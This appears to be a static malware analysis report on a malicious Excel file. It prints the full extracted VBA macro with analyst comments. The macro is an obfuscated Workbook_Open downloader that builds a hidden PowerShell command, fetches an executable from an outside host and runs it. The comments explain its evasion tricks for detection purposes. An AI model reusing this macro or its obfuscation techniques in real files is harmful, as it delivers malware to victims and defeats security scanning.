Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b4cd2b1460700b51…

MALICIOUS

Office (OLE)

50.5 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: 1f54e345b8b2c87aa1f291ff16e95e93 SHA-1: a48645115a682ab4a104d63c612386b037668116 SHA-256: b4cd2b1460700b51f443deb9cabf757ec647c7dda61fd4ba49b1be9b1c4b8855
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a Workbook_Open VBA macro that uses obfuscated string concatenation to build a cmd.exe command line that launches PowerShell. The script then attempts to download a file named 'lenovo<random_number>.exe' from 'http://zeraum.com/mailout' (as reassembled from the split literals 'ze'+'rau'+'m.c'+'om/' in the extracted macro; note the single 'r' — the form 'zerraum' does not occur in the source) and execute it. This indicates downloader functionality, likely used to fetch and run a secondary payload.

Heuristics 5

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2792 bytes
SHA-256: 301bca23f657319c856e00128f1ee267a9af2da802a631abd3fd7609f20ccd6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

































































' Returns one fragment of the obfuscated PowerShell command line. generalaircraft()
' concatenates this with the other fragment functions and passes the result to Shell
' from Workbook_Open. The fragment is built from many short literals so that no
' single literal contains a recognisable keyword (the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
' finding in this report).
' NOTE(review): the \"" sequences look like an escaping artifact of how the decoded
' source was rendered in the report; the macro itself presumably contains "" (VBA's
' escaped double quote) — confirm against the raw olevba output.
Function opoosuumanimal()
' Held in a separate local so that 'My'+'D' and 'o'+'cu'+'me'+'nts' are never adjacent
' in one literal; once executed by PowerShell they concatenate to a folder name.
marmmmma = "e(('My'+'D"
' When executed, the "{2}{0}{3}{1}" template with -f reorders the tokens
' 'tF','rPath','Ge','olde' at runtime (appears to spell GetFolderPath), so the method
' name never appears as a literal. The preceding text reads variable bxzo91 (which
' ohomutaosaki() sets) via Get-ChildItem Variable:, then .Invoke()s the method on it.
' The fragment ends mid-expression; hunterdogcat() supplies the continuation.
opoosuumanimal = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91  ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + marmmmma + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function
' Returns the command fragment that follows opoosuumanimal() in generalaircraft().
' It closes the -f format expression opened there (tokens 'c','Ne'+'w-O'+'bj','t','e'
' reordered by "{1}{3}{0}{2}" appear to spell New-Object), instantiates the type
' named by sheetunderground(), and invokes a download method on it. The backticks
' inside the literals are PowerShell escape characters that are ignored when the
' string is run; here they only serve to break up keyword scanning (d`o`WnLOaDF`i`lE).
Function hunterdogcat()
' "nT" completes the type name begun in sheetunderground(); the rest opens the
' method name that is finished in the assignment below.
vuulcanilands = "nT" + ").\""d" + "o`" + "Wn"
' sheetunderground is a Function called without parentheses: VBA inserts its return
' value here. The fragment ends with the opening of the URL literal ('ht'), which
' imagesparagues() continues.
hunterdogcat = "3}{0}{2}\"" -f'c','Ne" + "w-O" + "bj','t','e') " + sheetunderground + vuulcanilands + "LOaDF`i`lE\"".\""iN`VoKe\""(('ht'+"
End Function
' Returns a .NET type name split across five literals and laced with PowerShell
' backtick escapes so that the name never appears whole in the VBA source. The
' trailing "nT" is appended by hunterdogcat(), which is the only caller in this module.
Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
' Returns a pseudo-random integer in [0, 9437005] as a string. imagesparagues() uses
' it as the numeric suffix of the dropped file name — this is the <random_number> in
' 'lenovo<random_number>.exe' from the summary. The value differs on every run, so
' the dropped file name cannot be matched as a fixed string; match on the
' 'lenovo' prefix plus digits instead.
Function starsunfire()
Dim gardengrass As String
' Reseed the generator so each open of the workbook yields a different number.
Randomize
' 9437006# is a Double literal (# suffix); Int() truncates, and assigning to a
' String local coerces the number to its decimal text form.
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
' Assembles the complete command line that Workbook_Open passes to Shell:
'   cmd.exe /c "  powershell <switches> <command ...>"
' The process name is split ("cm"+"d.e"+"Xe") and "PO"+"weRsH" only becomes
' "powershell" once bodychampion() contributes "ElL ...". The remaining fragments are
' appended in the order they must appear in the final PowerShell script:
' bodychampion (switches), ohomutaosaki, opoosuumanimal, hunterdogcat, imagesparagues.
' For detection: the resulting process chain is EXCEL.EXE -> cmd.exe -> powershell.exe
' with a long, mixed-case, backtick- and -f-laden command line.
Function generalaircraft()
' + and & are mixed deliberately; both concatenate here because every operand is a
' String, so the mix has no effect other than varying the source text.
generalaircraft = "cm" + "d.e" + "Xe   /" + "c ""  PO" + "weRsH" & bodychampion + ohomutaosaki & opoosuumanimal + hunterdogcat & imagesparagues
End Function

' Returns the final command fragment: the download URL, the destination path, the
' end of the retry loop, and the launch of the downloaded file.
Function imagesparagues()
' Random suffix for the dropped file name (see starsunfire()); evaluated once so the
' same value is used for both the download destination and the later launch.
inextimer = starsunfire
' Continues the 'ht' literal opened in hunterdogcat(): 'tp:'+'//'+'ze'+'rau'+'m.c'+'om/'
' +'ma'+'ilo'+'ut' reassembles to http://zeraum.com/mailout (single 'r'). The second
' argument is the destination "$lenovo\<random>.exe", where $lenovo holds the folder
' path resolved earlier in the script. "}wh" begins closing the do{ } loop that
' ohomutaosaki() opened.
holeblackdeep = "'tp:'+'//'+'ze'+'rau'+'m.c'+'om/'+'ma'+'ilo'+'ut'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
' "ile(!$?);" makes the loop repeat until the download call succeeds ($? is
' PowerShell's last-command status). The -f expression with 'ro','S'+'tart-P','cess'
' appears to reassemble Start-Process, which is invoked via & on the dropped file.
' The trailing """"" encodes two literal double quotes that close the PowerShell
' command string and the cmd /c "..." argument opened in generalaircraft().
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
imagesparagues = holeblackdeep + fantaandcola
End Function
' Returns the fragment that opens the PowerShell script body. Leading "Fil" completes
' the "-nOpRO" switch from bodychampion() (-noprofile, prefix-abbreviated); the ""
' that follows is a VBA-escaped quote that opens the quoted PowerShell command.
' Inside: Sv (Set-Variable) stores a [type] resolved from the -f-reordered tokens
' 'ENv','IroN','MenT' into variable bXzO91 — this is the variable opoosuumanimal()
' later reads back. "do{" opens a retry loop that imagesparagues() closes; its first
' statement invokes 's'+'lee'+'p' (sleep) with 41, i.e. a 41-second pause on every
' iteration — presumably to outlast short sandbox runs; confirm in dynamic analysis.
' "$lenovo =   (ge" is the start of the Get-ChildItem call continued in opoosuumanimal().
Function ohomutaosaki()
ohomutaosaki = "Fil  ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv'));  d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo =   (ge"
End Function
' Returns the PowerShell switch list. "ElL" completes "PO"+"weRsH" from generalaircraft()
' into the executable name. The switches use PowerShell's case-insensitive prefix
' matching and random casing so no literal matches the canonical spelling:
' -noLOGO, -NOeXIt, -noNINTERAcTIV (-NonInteractive), -WInDO hiDden (-WindowStyle Hidden),
' -EXecUtionP bYpAss (-ExecutionPolicy Bypass), and -nOpRO (+ "Fil" from ohomutaosaki()
' = -NoProfile). The hidden window and bypass policy are typical of unattended
' downloader stubs and are useful command-line detection features on their own.
Function bodychampion()
bodychampion = "ElL -noLOGO  -NOeXIt -noNI" + "NTERAcTIV  -WInDO  hiDd" + "en  -EXecUt" + "ionP  bYpAss  -nOpRO"
End Function
' Auto-execute entry point: Excel runs this event handler when the workbook is opened
' with macros enabled (OLE_VBA_WBOPEN finding). It launches the command line built by
' generalaircraft() in a child process.
Sub Workbook_Open()
' Shell's second argument is the window style. RibbonControlSizeRegular is an
' unrelated Office ribbon enum whose value is 0 — the same as vbHide — so the window
' is hidden without the vbHide keyword appearing in the source. NOTE(review): value
' equivalence assumed from the enum definitions; confirm before relying on it in a rule.
Shell generalaircraft, RibbonControlSizeRegular

End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True